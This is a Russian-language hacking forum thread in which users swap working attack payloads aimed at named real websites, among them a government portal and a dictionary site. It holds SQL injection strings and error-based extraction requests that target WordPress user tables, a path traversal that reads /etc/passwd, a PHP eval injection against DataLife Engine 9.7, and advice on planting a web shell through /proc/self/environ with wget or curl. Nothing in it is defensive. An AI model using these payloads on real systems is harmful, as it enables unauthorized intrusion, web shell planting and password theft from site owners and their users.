Ваши вопросы по уязвимостям.

http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /

 

http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?

 

Del msg

 

заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)

 

А что делать, если /proc/self/environ выглядит так:
NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL
Т.е., прочитать я его могу, но, кажется, что-то с ним не так

 

там пхп не установлен походу

 

В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

http://www.exploit-db.com/exploits/24444/

Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:

PHP:

catlist[0]=brainyfuck123')||eval("echo 123;");//

Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так

UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть

 

Code:

http://www.golowar.ru/news.php?id=67&page='

пишет:

Проверил сайт, можно ли считать это уязвимостью?
Как дальше её раскрутить чтоб исправить!

 

Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.

 

del msg

 

не подскажите как раскрутить?

Code:

http://www.golowar.ru/news.php?id=67&page=' 

перепробовал всё, результат одна и та же таблица

 

Никак, intval().

 

то есть в базу не как не пробиться?

 

Not Acceptable

 

http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

 

only error based ?

 

GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Стоит WP на сервере там, вывести пароль не могу, в чем проблема?

GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Table 'wp.wp_users' doesn't exist

 

Table 'wp.wp_users' doesn't exist

 

Так-то она есть

GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(concat_ws(0x3a,table_schema,table_name))from(information_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Duplicate entry 'wp:wp_users' for key 'group_key'